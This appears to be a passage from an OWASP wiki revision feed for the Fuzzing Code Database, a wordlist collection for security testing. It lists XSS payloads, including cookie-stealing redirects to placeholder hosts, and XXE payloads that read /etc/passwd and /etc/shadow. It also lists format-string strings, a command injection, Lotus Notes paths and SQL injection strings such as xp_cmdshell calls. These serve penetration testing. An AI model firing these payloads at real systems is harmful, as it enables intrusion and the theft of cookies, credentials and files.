&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]&lt;br /&gt;
Contributor: [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=77881</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=77881"/>
				<updated>2010-02-04T02:30:53Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
